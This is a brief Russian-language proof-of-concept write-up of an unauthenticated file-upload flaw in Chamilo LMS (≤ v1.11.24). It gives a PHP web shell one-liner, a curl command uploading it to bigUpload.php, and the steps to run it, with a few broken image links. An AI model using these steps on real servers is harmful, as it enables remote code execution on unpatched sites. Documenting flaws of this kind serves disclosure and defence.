
Неограниченная загрузка файлов в функциональности загрузки больших файлов в `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` в Chamilo LMS <= v1.11.24 позволяет неаутентифицированным злоумышленникам выполнять сохранённые XSS-атаки и получать удалённое выполнение кода посредством загрузки веб-шелла.
Неограниченная загрузка файлов в механизме большой загрузки файлов /main/inc/lib/javascript/bigupload/inc/bigUpload.php в Chamilo LMS <= v1.11.24 позволяет неаутентифицированным злоумышленникам выполнять хранимые XSS-атаки и получать удаленное выполнение кода посредством загрузки веб-шелла.
Функциональность большой загрузки файлов через /main/inc/lib/javascript/bigupload/inc/bigUpload.php позволяет загружать произвольные файлы в каталог /main/inc/lib/javascript/bigupload/files в пределах корневого каталога веб-сервера.
Если каталог /main/inc/lib/javascript/bigupload/files существует, мы можем загрузить произвольный файл следующим образом;
Создайте вредоносный PHP-файл echo '<?php system("whoami"); ?>' > dollarboysushil.php
.png)
Затем мы можем загрузить этот файл, выполнив следующую команду:
`$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'`
.png)
Мы можем проверить, что наш файл загружен, посетив каталог /main/inc/lib/javascript/bigupload/files
.png)
И мы можем выполнить его, нажав на PHP-файл, что даст вывод команды whoami
.png)